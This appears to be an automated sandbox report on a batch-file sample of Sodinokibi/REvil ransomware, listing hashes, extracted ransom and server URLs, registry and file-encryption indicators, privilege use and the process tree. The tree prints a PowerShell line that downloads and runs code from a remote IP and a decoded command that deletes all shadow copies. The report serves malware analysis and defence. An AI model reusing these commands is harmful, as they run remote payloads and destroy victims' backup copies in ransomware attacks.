Analysis
max time kernel: 137s
max time network: 151s
platform: windows7_x64
resource: win7v200722
submitted: 08-08-2020 21:10

Static task: static1
Behavioral task: behavioral1
  Sample: d0333bd53e654eef1380155f828b71d5.bat
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: d0333bd53e654eef1380155f828b71d5.bat
  Resource: win10
General
Target: d0333bd53e654eef1380155f828b71d5.bat
Size: 219B
MD5: 72cc00975d3f7dc5564c1a0fdbd1897b
SHA1: 7eac1c6c294cf6a12495a484965884263cd77ff2
SHA256: c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
SHA512: 9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9
Malware Config
Extracted: http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5
Extracted: C:\80242-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085
    http://decryptor.cc/F95CCF8219484085
Signatures

Modifies service (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Drops file in Program Files directory (25 IoCs)
Processes:
description | ioc | process
File opened for modification | \??\c:\program files\TestShow.rtf | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\80242-readme.txt | powershell.exe
File created | \??\c:\program files (x86)\80242-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConvertToSet.M2V | powershell.exe
File opened for modification | \??\c:\program files\GroupPublish.M2V | powershell.exe
File opened for modification | \??\c:\program files\MountRestart.mpv2 | powershell.exe
File opened for modification | \??\c:\program files\RequestSearch.mpg | powershell.exe
File opened for modification | \??\c:\program files\StepEnter.php | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\80242-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\DisconnectExit.ppt | powershell.exe
File opened for modification | \??\c:\program files\ExportImport.wma | powershell.exe
File opened for modification | \??\c:\program files\ExportTest.mpg | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\80242-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\StopSwitch.i64 | powershell.exe
File opened for modification | \??\c:\program files\ConnectConvertFrom.wmf | powershell.exe
File opened for modification | \??\c:\program files\EnterUse.3gp | powershell.exe
File opened for modification | \??\c:\program files\PingEdit.ppsx | powershell.exe
File opened for modification | \??\c:\program files\SetJoin.avi | powershell.exe
File opened for modification | \??\c:\program files\TraceComplete.css | powershell.exe
File opened for modification | \??\c:\program files\UnlockSet.mpp | powershell.exe
File opened for modification | \??\c:\program files\UnpublishSubmit.ogg | powershell.exe
File opened for modification | \??\c:\program files\UseSelect.ttf | powershell.exe
File created | \??\c:\program files\80242-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\EnterInitialize.mpeg2 | powershell.exe
File opened for modification | \??\c:\program files\WatchUnblock.inf | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pay7so6y.bmp" | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
pid | process
1460 | powershell.exe
Blacklisted process makes network request (114 IoCs)
Processes:
flow | pid | process
All listed flows originate from pid 1460 (powershell.exe); flow ids: 3, 7, 9, 10, 12, 14, 16, 17, 19, 20, 22, 23, 25, 27, 29, 31, 33, 34, 36, 37, 40, 41, 43, 44, 46, 47, 49, 50, 52, 54, 55, 57, 59, 60, 63, 65, 66, 68, 69, 71, 73, 75, 76, 78, 80, 82, 85, 86, 88, 90, 92, 94, 95, 97, 99, 101, 102, 104, 105, 107, 108, 110, 112, 113
Modifies system certificate store
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (DER certificate blob omitted; it carries the subject "DST Root CA X3", Digital Signature Trust Co.) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (certificate blob omitted) | powershell.exe
Note: writes under SystemCertificates\AuthRoot\Certificates are the location Windows uses for its automatic root certificate update, so on their own these entries are not evidence that the sample installed its own certificate.
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)

Modifies extensions of user files (12 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
description | ioc | process
File renamed | C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.80242 | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\DisableExpand.tiff | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\StopGroup.tiff | powershell.exe
File renamed | C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.80242 | powershell.exe
File renamed | C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.80242 | powershell.exe
File opened for modification | \??\c:\users\admin\pictures\HidePing.tiff | powershell.exe
File renamed | C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.80242 | powershell.exe
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
description | pid | process | target process
PID 1296 wrote to memory of 1460 | 1296 | cmd.exe | powershell.exe
PID 1296 wrote to memory of 1460 | 1296 | cmd.exe | powershell.exe
PID 1296 wrote to memory of 1460 | 1296 | cmd.exe | powershell.exe
PID 1296 wrote to memory of 1460 | 1296 | cmd.exe | powershell.exe
PID 1460 wrote to memory of 1784 | 1460 | powershell.exe | powershell.exe
PID 1460 wrote to memory of 1784 | 1460 | powershell.exe | powershell.exe
PID 1460 wrote to memory of 1784 | 1460 | powershell.exe | powershell.exe
PID 1460 wrote to memory of 1784 | 1460 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 1460 | powershell.exe
Token: SeDebugPrivilege | 1460 | powershell.exe
Token: SeDebugPrivilege | 1784 | powershell.exe
Token: SeBackupPrivilege | 1608 | vssvc.exe
Token: SeRestorePrivilege | 1608 | vssvc.exe
Token: SeAuditPrivilege | 1608 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1460 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
pid | process
1460 | powershell.exe
1460 | powershell.exe
1460 | powershell.exe
1784 | powershell.exe
1784 | powershell.exe
Drops file in System32 directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Processes

C:\Windows\system32\cmd.exe (level 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"
  PID: 1296
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"
    PID: 1460
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Blacklisted process makes network request
    - Modifies system certificate store
    - Modifies extensions of user files
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in System32 directory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -e argument (UTF-16LE base64): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      This is the shadow-copy deletion that accounts for the vssvc.exe activity and the SeBackupPrivilege/SeRestorePrivilege use recorded above.
      PID: 1784
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (level 1)
  Command line: C:\Windows\system32\vssvc.exe
  PID: 1608
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken